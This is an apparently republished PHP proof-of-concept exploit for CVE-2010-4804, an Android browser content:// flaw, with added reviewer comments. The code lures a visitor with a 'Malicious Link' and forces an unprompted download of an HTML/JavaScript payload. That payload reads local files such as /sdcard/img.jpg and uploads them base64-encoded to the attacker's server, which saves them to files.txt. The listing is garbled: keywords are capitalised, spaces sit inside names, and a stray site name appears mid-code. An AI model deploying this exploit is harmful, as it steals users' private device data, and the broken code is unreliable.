<? Php
/*
* Description: Android 'content://' URI Multiple Information Disclosure Vulnerabilities
* Bugtraq ID: 48256
* CVE: CVE-2010-4804
* Affected: Android <2.3.4
* Author: Thomas Cannon
* Discovered: 18-Nov-2010
* Advisory: http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/
*
* Filename: poc.php
* Instructions: Specify the files you want to upload in the filenames array. Host this php file
* on a server and visit it using the Android Browser. Some builds of Android
* may require adjustments to the script; for example, when a German build was
* tested it downloaded the payload as .htm instead of .html, even though .html
* was specified.
*
* Tested on: HTC Desire (UK Version) with Android 2.2
*/
// List of the files on the device that we want to upload to our server
// NOTE(review): this listing has been passed through a translator/formatter
// (capitalised keywords, spaces inside variable names and tags); it is not
// valid PHP as shown and is kept as a historical record of the CVE-2010-4804
// proof of concept described in the header.
// Device paths to read. Both are fixed strings set by the script author;
// nothing in this list comes from the request.
$ Filenames = array ("/proc/version", "/sdcard/img.jpg ");
// Determine the full URL of this script
// HTTP_HOST is taken from the request's Host header, so the URL assembled
// here is request-controlled; stage0 and stage1 interpolate it into HTML
// without escaping.
$ Protocol = $ _ SERVER ["HTTPS"] = "on "? "Https": "http ";
$ Scripturl = $ protocol. ": //". $ _ SERVER ["HTTP_HOST"]. $ _ SERVER ["SCRIPT_NAME"];
// Stage 0: Display introduction text and a link to start the PoC.
// Stage 0: landing page. The only output is a link to ?stage=1.
// $scripturl (built from HTTP_HOST) is placed in the href without
// htmlspecialchars(), so the page reflects request data into markup.
Function stage0 ($ scripturl ){
Echo "<B> Android <2.3.4 </B> <br> Data Stealing Web Page <br> Click: <a href = \" $ scripturl? Stage = 1 \ "> Malicious Link </a> ";
}
// Stage 1: Redirect to Stage 2 which will force a download of the HTML/JS payload, then a few seconds later redirect
// to the payload. We load the payload using a Content Provider so that the JavaScript is executed in the
// context of the local device - this is the vulnerability.
// Stage 1: emits a <body onload> with two timers: the first navigates to
// ?stage=2 (the forced download), the second navigates to a content:// URI
// that points at the downloaded file under /sdcard/download. Per the header,
// opening a local file through the content provider is what lets the
// payload's JavaScript read device files on Android < 2.3.4 - a platform bug,
// not something the hosting site can fix. From a defender's view the
// observable tell is web content triggering a navigation to a content:// URI
// shortly after an unprompted download.
// $scripturl is again interpolated unescaped.
Function stage1 ($ scripturl ){
Echo "<body onload = \" setTimeout ('window. location = \ '$ scripturl? Stage = 2 \ '', 1000); setTimeout ('window. location = \ 'content: // com.android.html fileprovider/sdcard/download/poc.html \ '', 5000); \"> ";
}
// Stage 2: Download of payload; the Android browser doesn't prompt for the download, which is another vulnerability.
// The payload uses AJAX calls to read file contents, encodes them as Base64, then uploads to the server (Stage 3).
// Stage 2: serves the HTML/JS payload as an attachment named poc.html.
// The response headers below force a download; the header comment notes
// the vulnerable browser saved it without prompting. The JavaScript that
// follows runs later from the content:// origin reached in stage 1, which is
// where it gains access to local paths.
// $filenames is the fixed list from the top of the script; $scripturl is the
// request-derived URL used as the form action for stage 3.
Function stage2 ($ scripturl, $ filenames ){
Header ("Cache-Control: public ");
Header ("Content-Description: File Transfer ");
Header ("Content-Disposition: attachment; filename=poc.html ");
Header ("Content-Type: text/html ");
Header ("Content-Transfer-Encoding: binary ");
?>
<Html>
<Body>
<Script language = 'javascript '>
// Paths come from the PHP $filenames array via implode(); they are not
// derived from the visitor's request.
Var filenames = Array ('<? Php echo implode ("','", $ filenames);?> ');
Var filecontents = new Array ();
// Masks each response character to 8 bits so the result round-trips
// through btoa() for non-text content.
Function processBinary (xmlhttp ){
Data = xmlhttp. responseText; r = ''; size = data. length;
For (var I = 0; I <size; I ++) r + = String. fromCharCode (data. charCodeAt (I) & 0xff );
Return r;
}
// One synchronous XMLHttpRequest (third open() argument is false) per path;
// each response is stored base64-encoded in filecontents keyed by path.
// Under the content:// origin of stage 1 these GETs resolve against the
// local file system, which is the disclosure the advisory describes.
Function getFiles (filenames ){
For (var filename in filenames ){
Filename = filenames [filename];
Xhr = new XMLHttpRequest ();
Xhr. open ('get', filename, false );
Xhr. overrideMimeType ('text/plain; charset = x-user-defined ');
Xhr. onreadystatechange = function () {if (xhr. readyState = 4) {filecontents [filename] = btoa (processBinary (xhr ));}}
Xhr. send ();
}
}
// Appends one <input> carrying a name/value pair to the form.
Function addField (form, name, value ){
Var fe = document. createElement ('input ');
Fe. setAttribute ('type', 'ddd ');
Fe. setAttribute ('name', name );
Fe. setAttribute ('value', value );
Form. appendChild (fe );
}
// Builds a POST form whose action is this script's ?stage=3 endpoint, adds
// filenameN / dataN pairs (both base64) and submits it without any user
// interaction. The action URL is emitted by PHP, again unescaped.
Function uploadFiles (filecontents ){
Var form = document. createElement ('form ');
Form. setAttribute ('method', 'post ');
Form. setAttribute ('enabledype ', 'multipart/form-data ');
Form. setAttribute ('action', '<? = $ Scripturl?>? Stage = 3 ');
Var I = 0;
For (var filename in filecontents ){
AddField (form, 'filename' + I, btoa (filename ));
AddField (form, 'data' + I, filecontents [filename]);
I + = 1;
}
Document. body. appendChild (form );
Form. submit ();
}
GetFiles (filenames );
UploadFiles (filecontents );
</Script>
</Body>
</Html>
<? Php
} Www.2cto.com
// Stage 3: Read the file names and contents sent by the payload and write to a file on the server.
// Stage 3: collection endpoint for the form submitted by the stage 2 payload.
// Dumps the raw $_POST array (print_r output, not a validated format) into
// files.txt in the script's own directory and then links to it, so whatever
// was collected is itself readable by anyone who can reach this server -
// there is no access control, authentication or origin check on either the
// upload or the resulting file. Each request overwrites the previous dump
// ("w" mode).
Function stage3 (){
$ Fp = fopen ("files.txt", "w") or die ("Couldn't open file for writing! ");
Fwrite ($ fp, print_r ($ _ POST, TRUE) or die ("Couldn't write data to file! ");
Fclose ($ fp );
Echo "Data uploaded to <a href = \" files.txt \ "> files.txt </a>! ";
}
// Select the stage to run depending on the parameter passed in the URL
// Dispatch on the ?stage= query parameter. Any value other than "1", "2",
// "3" (including a missing parameter, which raises an undefined-index
// notice in PHP) falls through to the stage 0 landing page.
Switch ($ _ GET ["stage"]) {
Case "1 ":
Stage1 ($ scripturl );
Break;
Case "2 ":
Stage2 ($ scripturl, $ filenames );
Break;
Case "3 ":
Stage3 ();
Break;
Default:
Stage0 ($ scripturl );
Break;
}
?>